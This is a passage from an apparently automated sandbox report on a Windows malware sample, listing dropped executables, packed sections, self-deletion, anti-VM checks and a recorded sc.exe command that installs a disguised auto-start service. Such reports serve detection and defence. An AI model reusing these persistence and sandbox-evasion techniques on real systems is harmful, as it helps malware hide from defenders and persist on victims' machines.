                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 15_2_009395D5 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 15_2_0093963A push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_00793634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 18_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00424468 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00A8480F push ds; ret
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00A87005 push 0000002Bh; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_000F8C65 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_000F7649 push ebp; ret
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_00B53C43 push ss; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04ACCCB8 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04ACCCF8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 35_2_00088C65 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 35_2_00087649 push ebp; ret
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 43_2_00C58C65 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 43_2_00C57649 push ebp; ret
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 43_2_03023C58 push esp; iretd
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041AA4B LoadLibraryA,GetProcAddress,VirtualProtect,
                      Source: 9355.exe.11.drStatic PE information: 0x87B69BB9 [Mon Feb 24 21:52:57 2042 UTC]
                      Source: 3YzgU3S0nW.exeStatic PE information: section name: .fuhi
                      Source: F338.exe.11.drStatic PE information: section name: .bajut
                      Source: FFBD.exe.11.drStatic PE information: section name: .adata
                      Source: FFBD.exe.11.drStatic PE information: section name: .adata
                      Source: 7085.exe.11.drStatic PE information: section name: .fuhi
                      Source: 8132.exe.11.drStatic PE information: section name: .cixi
                      Source: 8A8A.exe.11.drStatic PE information: section name: .vupa
                      Source: ahtdegs.11.drStatic PE information: section name: .fuhi
                      Source: sqlite3.dll.22.drStatic PE information: section name: /4
                      Source: sqlite3.dll.22.drStatic PE information: section name: /19
                      Source: sqlite3.dll.22.drStatic PE information: section name: /35
                      Source: sqlite3.dll.22.drStatic PE information: section name: /51
                      Source: sqlite3.dll.22.drStatic PE information: section name: /63
                      Source: sqlite3.dll.22.drStatic PE information: section name: /77
                      Source: sqlite3.dll.22.drStatic PE information: section name: /89
                      Source: sqlite3.dll.22.drStatic PE information: section name: /102
                      Source: sqlite3.dll.22.drStatic PE information: section name: /113
                      Source: sqlite3.dll.22.drStatic PE information: section name: /124
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /4
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /19
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /35
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /51
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /63
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /77
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /89
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /102
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /113
                      Source: sqlite3[1].dll.22.drStatic PE information: section name: /124
                      Source: atingifo.exe.23.drStatic PE information: section name: .vupa
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86803084592
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.73571635884
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99705057771
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86803084592
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.87994948789
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86634281185
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86803084592
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86634281185
                      Source: 9355.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 9355.exe.11.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 24.0.9355.exe.f0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 24.0.9355.exe.f0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 24.0.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 24.0.9355.exe.f0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 24.0.9355.exe.f0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 24.0.9355.exe.f0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 24.2.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 24.2.9355.exe.f0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 24.0.9355.exe.f0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 24.0.9355.exe.f0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 35.0.9355.exe.80000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 35.0.9355.exe.80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 35.2.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 35.2.9355.exe.80000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 35.0.9355.exe.80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 35.0.9355.exe.80000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 35.0.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 35.0.9355.exe.80000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 35.0.9355.exe.80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 35.0.9355.exe.80000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 43.0.9355.exe.c50000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 43.0.9355.exe.c50000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 43.2.9355.exe.c50000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
                      Source: 43.2.9355.exe.c50000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ahtdegsJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8132.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F338.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8A8A.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\175C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FFBD.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7085.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeFile created: C:\Users\user\AppData\Local\Temp\atingifo.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ahtdegsJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\tfktmtml\atingifo.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9355.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\tfktmtml\atingifo.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\3yzgu3s0nw.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ahtdegs:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 3YzgU3S0nW.exe, 00000002.00000002.333594039.00000000004C7000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
